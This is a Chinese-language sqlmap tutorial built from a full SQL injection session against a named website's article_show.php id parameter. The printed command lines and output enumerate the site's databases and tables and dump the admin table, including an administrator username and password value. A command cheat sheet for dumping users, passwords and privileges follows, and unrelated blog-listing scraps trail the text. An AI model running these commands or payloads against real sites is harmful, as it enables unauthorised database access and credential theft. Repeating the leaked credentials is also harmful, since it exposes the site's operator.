注:标黄处为输入内容     批注为得到的信息

1.-u url --dbs 爆数据库

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dbs

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:23:20

[15:23:21] [INFO] resuming back-end DBMS 'mysql'

[15:23:21] [INFO] testing connection to the target url

[15:23:22] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:23:22] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:23:22] [INFO] fetching database names

[15:23:22] [INFO] the SQL query used returns 5 entries

[15:23:22] [INFO] resumed: "information_schema"

[15:23:22] [INFO] resumed: "gold"

[15:23:22] [INFO] resumed: "mysql"

[15:23:22] [INFO] resumed: "performance_schema"

[15:23:22] [INFO] resumed: "test"

available databases [5]:

[*] gold

[*] information_schema

[*] mysql

[*] performance_schema

[*] test

[15:23:23] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:23:23

2. -u url --tables -D 数据库 //爆表段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --tables -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:52:54

[15:52:54] [INFO] resuming back-end DBMS 'mysql'

[15:52:55] [INFO] testing connection to the target url

[15:52:56] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:52:56] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:52:56] [INFO] fetching tables for database: 'gold'

[15:52:58] [INFO] the SQL query used returns 5 entries

[15:52:59] [INFO] retrieved: "admin"

[15:53:00] [INFO] retrieved: "article"

[15:53:01] [INFO] retrieved: "class"

[15:53:02] [INFO] retrieved: "content"

[15:53:03] [INFO] retrieved: "djjl"

Database: gold

[5 tables]

+---------+

| admin   |

| article |

| class   |

| content |

| djjl    |

+---------+

[15:53:04] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:53:04

3. -u url --columns -T 表段 -D 数据库 //爆字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --columns -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:58:10

[15:58:10] [INFO] resuming back-end DBMS 'mysql'

[15:58:10] [INFO] testing connection to the target url

[15:58:12] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:58:12] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:58:12] [INFO] fetching columns for table 'admin' in database 'gold'

[15:58:13] [INFO] the SQL query used returns 3 entries

[15:58:14] [INFO] retrieved: "id","int(2)"

[15:58:15] [INFO] retrieved: "user","char(12)"

[15:58:16] [INFO] retrieved: "password","char(36)"

Database: gold

Table: admin

[3 columns]

+----------+----------+

| Column   | Type     |

+----------+----------+

| id       | int(2)   |

| password | char(36) |

| user     | char(12) |

+----------+----------+

[15:58:17] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:58:17

4.-u url --dump -C 字段 -T 表段 -D 数据库 //猜解

(1) 猜解password字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C password -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:02:05

[16:02:05] [INFO] resuming back-end DBMS 'mysql'

[16:02:05] [INFO] testing connection to the target url

[16:02:06] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:02:06] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:02:06] [INFO] fetching entries of column(s) 'password' for table 'admin' in

database 'gold'

[16:02:08] [INFO] the SQL query used returns 1 entries

[16:02:09] [INFO] retrieved: "ecoDz4IPZGYNs"

[16:02:09] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+---------------+

| password      |

+---------------+

| ecoDz4IPZGYNs |

+---------------+

[16:02:09] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:02:09] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:02:09

(2) 猜解id字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C id -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:10:22

[16:10:22] [INFO] resuming back-end DBMS 'mysql'

[16:10:22] [INFO] testing connection to the target url

[16:10:23] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:10:23] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:23] [INFO] fetching entries of column(s) 'id' for table 'admin' in databa

se 'gold'

[16:10:24] [INFO] the SQL query used returns 1 entries

[16:10:25] [INFO] retrieved: "1"

[16:10:25] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+----+

| id |

+----+

| 1  |

+----+

[16:10:25] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:25] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:10:25

(3) 猜解user字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C user -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:10:48

[16:10:48] [INFO] resuming back-end DBMS 'mysql'

[16:10:48] [INFO] testing connection to the target url

[16:10:49] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:10:49] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:49] [INFO] fetching entries of column(s) 'user' for table 'admin' in data

base 'gold'

[16:10:49] [INFO] the SQL query used returns 1 entries

[16:10:50] [INFO] retrieved: "ssb"

[16:10:51] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+------+

| user |

+------+

| ssb  |

+------+

[16:10:51] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:51] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:10:51

[root@Hacker~]# Sqlmap

5.sqlmap工具的使用命令

mssql access 直接爆表.然后你懂的

BT5里面的话前面就要加python

sqlmap.py -u url --dbs //爆数据库

sqlmap.py -u url --current-db //爆当前库

sqlmap.py -u url --current-user //爆当前用户

sqlmap.py -u url --users   查看用户权限

sqlmap.py -u url --tables -D 数据库 //爆表段

sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段

sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解

sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

翻回来也可以

sqlmap.py -u url  判断

sqlmap.py -u url --is-dba -v   这是判断当前数据库的使用者是否是dba

sqlmap.py -u url --users -v 0  这句的目的是列举数据库的用户

sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码

sqlmap.py -u url --privileges -v 0 这是判断当前的权限

sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来

sqlmap.py -u url --tables -D '表' 爆表

sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列

sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内

sqlmap.py -u url --dump -all -v 0

sqlmap 使用方法及实例的更多相关文章

  1. React构建单页应用方法与实例

    React作为目前最流行的前端框架之一,其受欢迎程度不容小觑,从这门框架上我们可以学到许多其他前端框架所缺失的东西,也是其创新性所在的地方,比如虚拟DOM.JSX等.那么接下来我们就来学习一下这门框架 ...

  2. Redux状态管理方法与实例

    状态管理是目前构建单页应用中不可或缺的一环,也是值得花时间学习的知识点.React官方推荐我们使用Redux来管理我们的React应用,同时也提供了Redux的文档来供我们学习,中文版地址为http: ...

  3. JQuery 获取json数据$.getJSON方法的实例代码

    这篇文章介绍了JQuery 获取json数据$.getJSON方法的实例代码,有需要的朋友可以参考一下 前台: function SelectProject() { var a = new Array ...

  4. (转)Java 的swing.GroupLayout布局管理器的使用方法和实例

    摘自http://www.cnblogs.com/lionden/archive/2012/12/11/grouplayout.html (转)Java 的swing.GroupLayout布局管理器 ...

  5. Springmvc+Spring+Hibernate搭建方法及实例

    Springmvc+Spring+Hibernate搭建方法及实例  

  6. jQuery中on()方法用法实例详解

    这篇文章主要介绍了jQuery中on()方法用法,实例分析了on()方法的功能及各种常见的使用技巧,并对比分析了与bind(),live(),delegate()等方法的区别,需要的朋友可以参考下 本 ...

  7. (转)多个mapreduce工作相互依赖处理方法完整实例(JobControl)

    多个mapreduce工作相互依赖处理方法完整实例(JobControl) 原文地址:http://mntms.iteye.com/blog/2096456?utm_source=tuicool&am ...

  8. SQLMAP注入教程-11种常见SQLMAP使用方法详解

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直 ...

  9. Java——静态变量/方法与实例变量/方法的区别

    静态只能调用静态 非静态: 对象名.方法名 package ti; //通过两个类 StaticDemo.LX4_1 说明静态变量/方法与实例变量/方法的区别. class StaticDemo { ...

随机推荐

  1. Stm32CubeMX5 配置 外部中断

    实验使用连接PA8引脚的按键触发中断,外部中断使用双边沿触发,这样就可以检测按键按下与松开,当按键按下时点亮LED, 当按键松开是关闭LED,在中断服务函数中只置位相应的标志,在main函数中具体处理 ...

  2. Codeforces 1169E DP

    题意:给你一个长度为n的序列,有q次询问,每次询问给出两个位置x和y(x < y),问是否可从x到达y?可达的定义是:如果存在一个序列(假设长度为k),其中p1 = x, pk = y,并且这个 ...

  3. androidstudio 2.3.3 jni过程汇总(1):1、自己编写c文件并使用(原)

    1.编写java代码,指定lib和native方法.package com.taven.myapplication; package com.taven.myapplication; import a ...

  4. Atcoder arc093

    D-Grid Components 在一个100*100的网格图上染色,问黑格四连通块的个数为A,白格四连通块的个数为B的一种构造方案?(A,B<=500) 将整个平面分成50*100的两部分, ...

  5. Qt 【“QWebView/private/qwebview interface p.h”: No such file or directory】

    这种情况下需要在pro工程文件中添加 QT += webkitwidgets 然后清理当前工程, 重新构建,在运行即可. 如果还不行,那么在#include <QWebView>这样替换成 ...

  6. zabbix 发送邮件到企业微信

    #!/usr/bin/python2.7#_*_coding:utf-8 _*_#auther:拿来用用import requests,sys,jsonimport urllib3urllib3.di ...

  7. Magento用SQL语句开发篇

    有时为了调试magento,需要获取当前的查询sql语句,在magento中获取SQL语句,这里我们通过$collection->getSelectSql(true)来调试sql 1 $coll ...

  8. contest-20191021

    文化课读的真不开心 回来竞赛 假人 sol 根据不等式有 abs(a-b)+abs(b-c)>=abs(a-c) 那么每一个都会选. 可以发现每一段只会选在端点上(否则移到端点更优). 那么dp ...

  9. C#网页数据采集(三)HttpWebRequest

    <span style="font-family: Arial, Helvetica, sans-serif; background-color: rgb(255, 255, 255) ...

  10. Python 多线程同步队列模型

    Python 多线程同步队列模型 我面临的问题是有个非常慢的处理逻辑(比如分词.句法),有大量的语料,想用多线程来处理. 这一个过程可以抽象成一个叫“同步队列”的模型. 具体来讲,有一个生产者(Dis ...